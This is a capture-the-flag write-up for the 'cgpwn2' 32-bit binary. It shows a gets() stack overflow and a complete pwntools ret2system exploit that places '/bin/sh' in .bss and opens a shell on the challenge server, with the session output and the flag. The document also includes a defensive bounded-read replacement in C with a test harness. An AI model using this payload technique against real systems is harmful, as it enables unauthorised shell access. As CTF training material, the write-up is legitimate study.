0x01 Finding the vulnerability
checksec
kk@ubuntu:~/Desktop/black/GFSJ/cgpwn2$ checksec ./cgpwn2
[*] '/home/kk/Desktop/black/GFSJ/cgpwn2/cgpwn2'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
IDA analysis
int __cdecl main(int argc, const char **argv, const char **envp)
{
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    hello();
    puts("thank you");
    return 0;
}
Enter the hello function

There is a stack overflow at gets(&s).

name is in the .bss segment, so perhaps the fgets call can be used to write something into it. Keep reading.
The program calls the system function.

0x02 Analysis and exploitation
Use the stack overflow to call system, and at the same time write "/bin/sh" into name and set the argument address to the start of name; that gives a shell!
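As an added defensive counterpart (this is not code from the writeup or from the challenge binary), here is a bounded replacement for the gets(&s) read in hello(), with a small harness that feeds constructed input through fmemopen and checks that a value placed right after the 0x26-byte buffer survives. The struct-with-sentinel is an assumption standing in for the real stack frame, and the 0x26 size is taken from the payload offset above.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L /* for fmemopen */
#endif
#include <stdio.h>
#include <string.h>

/* 0x26 is the distance from s to the saved ebp in hello(), as the exploit
   payload shows; gets() lets anything longer overrun the frame. */
#define MSG_LEN 0x26

/* Bounded replacement for gets(&s): stores at most size-1 bytes, always
   NUL-terminates, strips the trailing newline and drains the rest of an
   over-long line so it cannot leak into the next read. Returns bytes stored. */
size_t read_message_safe(FILE *in, char *s, size_t size)
{
    if (size == 0)
        return 0;
    if (fgets(s, (int)size, in) == NULL) {
        s[0] = '\0';
        return 0;
    }
    size_t n = strlen(s);
    if (n > 0 && s[n - 1] == '\n') {
        s[--n] = '\0';
    } else if (n == size - 1) {
        /* Truncated: discard what gets() would have written past the buffer. */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return n;
}

/* Harness (assumed layout): sentinel sits where saved ebp/EIP would be.
   Input is a constructed string served via fmemopen. Returns bytes stored,
   or (size_t)-1 if the sentinel was clobbered or input was left unread. */
size_t demo_bounded_read(const char *input)
{
    struct { char s[MSG_LEN]; unsigned int sentinel; } frame;
    frame.sentinel = 0xdeadbeefu;
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return (size_t)-1;
    size_t n = read_message_safe(in, frame.s, sizeof frame.s);
    int next = fgetc(in); /* the whole line must have been consumed */
    fclose(in);
    if (frame.sentinel != 0xdeadbeefu || next != EOF)
        return (size_t)-1;
    return n;
}
```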
0x03 Attack
#!/usr/bin/python
from pwn import *

io = remote("111.198.29.45", 39409)
# io = process("./cgpwn2")
context.log_level = 'debug'

sys_addr = 0x08048420            # address of system in the binary (from IDA)
io.recvuntil(b"your name")
io.sendline(b"/bin/sh")          # fgets stores this into name in .bss
bin_sh_addr = 0x0804A080         # address of name in .bss
io.recvuntil(b"leave some message here:")
# 0x26 bytes fill s, 4 bytes overwrite saved ebp, the return address becomes
# system, then a fake return address for system, then its argument.
payload = b"a" * 0x26 + b"aaaa" + p32(sys_addr) + b"aaaa" + p32(bin_sh_addr)
io.sendline(payload)
io.interactive()
kk@ubuntu:~/Desktop/black/GFSJ/cgpwn2$ python exp.py
[+] Opening connection to 111.198.29.45 on port 39409: Done
[*] Switching to interactive mode
$ ls
bin
cgpwn2
dev
flag
lib
lib32
lib64
$ cat flag
cyberpeace{自己做吧口喜口喜}
$